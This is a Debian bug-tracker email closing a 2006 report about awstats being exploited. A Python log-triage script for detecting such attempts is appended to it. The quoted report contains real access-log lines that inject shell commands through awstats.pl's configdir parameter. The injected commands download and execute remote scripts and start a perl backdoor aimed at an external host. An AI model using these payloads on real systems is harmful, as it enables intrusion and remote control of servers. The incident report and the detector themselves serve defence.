Your message dated Wed, 5 Apr 2006 02:20:55 -0700
with message-id <[EMAIL PROTECTED]>
and subject line machine compromised with awstats.pl?configdir
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--- Begin Message ---
Package: awstat
Version: 6.4-1sarge1
Severity: critical
Tags: security patch
Justification: root security hole

Someone was able to install zbind on my machine using the following scripts.
The damage was limited to www-data, a restricted user, and logs were able
to monitor behaviour, but posed a large threat.

"GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
295
"GET /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 200
768
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
303
"GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
295
"GET /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 200
768
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
303
"GET /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;wget
http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006
217.160.242.90 8081;wget http://219.84.105.36/ping;chmod +x ping;./ping
217.160.242.90 8081;curl -o ping http://219.84.105.36/ping;chmod +x
ping;./ping 217.160.242.90 8081;cd /tmp/;curl -o temp2006
http://219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 8081;done;wget
http://219.84.105.36/ping;chmod +x ping;./ping 217.160.242.90 8081;curl -o
ping http://219.84.105.36/ping;chmod +x ping;./ping 217.160.242.90 8081;echo
e_exp;%00 HTTP/1.1" 200 1178

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.4.27-2-386
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)


--- End Message ---
--- Begin Message ---
This bug has been listed as unreproducible for a month, with no feedback
from the submitter.  I see no reason to keep it open if there's no proof it
exists in the Debian package.

Thanks,
-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
[EMAIL PROTECTED]                                   http://www.debian.org/

--- End Message ---
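
A defender's triage of access-log entries like the ones quoted in the bug report, as an added example that is not part of the original thread: it flags requests whose `configdir` parameter carries shell metacharacters and separates those the server answered with 2xx from those it rejected. The sample entries, the function names and the one-entry-per-line layout are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request target and status of a common/combined-format access log entry.
REQ = re.compile(r'"[A-Z]+ (?P<target>.*) HTTP/\d\.\d" (?P<status>\d{3})\b')
# configdir value: up to the next "&name=" pair or the end of the query string.
CONFIGDIR = re.compile(r'[?&]configdir=(.*?)(?=&[\w.]+=|$)', re.S)
# Shell metacharacters that a directory path parameter should never carry.
SHELL_META = re.compile(r'[|;`$&<>\n\x00]')

# Constructed sample entries (documentation addresses, harmless echo payloads).
SAMPLE = [
    '192.0.2.10 - - [05/Apr/2006:02:00:01 -0700] "GET /awstats/awstats.pl'
    '?configdir=|echo;echo YYY;echo| HTTP/1.1" 404 295',
    '192.0.2.10 - - [05/Apr/2006:02:00:02 -0700] "GET /cgi-bin/awstats.pl'
    '?configdir=|echo;echo YYY;echo| HTTP/1.1" 200 768',
    '192.0.2.11 - - [05/Apr/2006:02:05:00 -0700] "GET /cgi-bin/awstats.pl'
    '?configdir=%7Cecho%20b_exp%3B%00 HTTP/1.1" 200 1178',
    '198.51.100.7 - - [05/Apr/2006:02:06:00 -0700] "GET /cgi-bin/awstats.pl'
    '?config=example.org&configdir=/etc/awstats&output=main HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Apr/2006:02:06:05 -0700] "GET /index.html HTTP/1.1" 200 1024',
]

def configdir_value(target):
    """Return the percent-decoded configdir parameter, or None if absent."""
    m = CONFIGDIR.search(target)
    return unquote(m.group(1)) if m else None

def triage(lines):
    """Return (line_no, status, verdict, value) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        if not m:
            continue
        value = configdir_value(m.group('target'))
        if value is None or not SHELL_META.search(value):
            continue
        status = int(m.group('status'))
        # 2xx only shows a script answered at that path, not that a command ran.
        verdict = 'served' if 200 <= status < 300 else 'rejected'
        hits.append((n, status, verdict, value))
    return hits

if __name__ == '__main__':
    for n, status, verdict, value in triage(SAMPLE):
        print(f'line {n}: status {status} ({verdict}) configdir={value!r}')
```

Entries marked `served` are the ones to follow up on the host; the `rejected` ones are probes against paths that do not exist there.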